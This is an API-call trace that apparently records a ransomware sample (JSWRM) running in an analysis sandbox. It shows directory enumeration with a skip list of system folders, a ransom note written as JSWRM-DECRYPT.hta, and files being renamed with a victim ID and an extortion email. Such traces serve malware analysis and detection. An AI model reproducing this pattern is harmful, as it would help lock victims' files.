RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0068.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.138] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.138] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce7a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknav", cAlternateFileName="")) returned 1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2=".") returned 1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="..") returned 1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="...") returned 1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="windows") returned -1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="recovery") returned -1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="perflogs") returned -1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="documents and settings") returned 1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="$RECYCLE.BIN") returned 1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="system volume information") returned -1 [0068.138] lstrcmpiW (lpString1="osknav", lpString2="msocache") returned 1 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0068.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\jswrm-decrypt.hta")) returned 0xffffffff [0068.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0068.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1e0 [0068.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffb0 [0068.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0068.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.139] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.139] WriteFile (in: hFile=0x458, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0068.140] CloseHandle (hObject=0x458) returned 1 [0068.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0068.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffb0 | out: hHeap=0x1e0000) returned 1 [0068.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0068.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0068.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\jswrm-decrypt.hta")) returned 0x20 [0068.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0068.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.142] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce7a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4649c9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0068.142] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.142] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06ce7a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f4649c9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.143] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.143] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.143] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f4649c9, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f4649c9, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f4649c9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.143] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.143] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknavbase.xml", cAlternateFileName="")) returned 1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2=".") returned 1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="..") returned 1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="...") returned 1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="windows") returned -1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="recovery") returned -1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="perflogs") returned -1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="documents and settings") returned 1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="system volume information") returned -1 [0068.144] lstrcmpiW (lpString1="osknavbase.xml", lpString2="msocache") returned 1 [0068.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknavbase.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknavbase.xml", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknavbase.xml", lpUsedDefaultChar=0x0) returned 14 [0068.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknavbase.xml", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknavbase.xml", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknavbase.xml", lpUsedDefaultChar=0x0) returned 14 [0068.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0068.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.144] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0068.144] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.144] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9968344218429256) returned 0 [0068.144] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e8 [0068.144] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24f1e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24f1e8, lpNumberOfBytesRead=0x345e534*=0x0, lpOverlapped=0x0) returned 0 [0068.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e8 | out: hHeap=0x1e0000) returned 1 [0068.145] CloseHandle (hObject=0xffffffff) returned 1 [0068.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0068.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0068.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0068.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0068.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0068.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0068.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.145] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0068.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0068.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0068.145] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknavbase.xml", cAlternateFileName="")) returned 0 [0068.145] FindClose (in: hFindFile=0x231c80 | out: hFindFile=0x231c80) returned 1 [0068.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0068.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0068.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.168] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknav.xml", cAlternateFileName="")) returned 1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2=".") returned 1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="..") returned 1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="...") returned 1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="windows") returned -1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="recovery") returned -1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="perflogs") returned -1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="documents and settings") returned 1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="$RECYCLE.BIN") returned 1 [0068.168] lstrcmpiW (lpString1="osknav.xml", lpString2="system volume information") returned -1 [0068.169] lstrcmpiW (lpString1="osknav.xml", lpString2="msocache") returned 1 [0068.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknav.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknav.xml", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknav.xml", lpUsedDefaultChar=0x0) returned 10 [0068.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknav.xml", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="osknav.xml", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osknav.xml", lpUsedDefaultChar=0x0) returned 10 [0068.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, 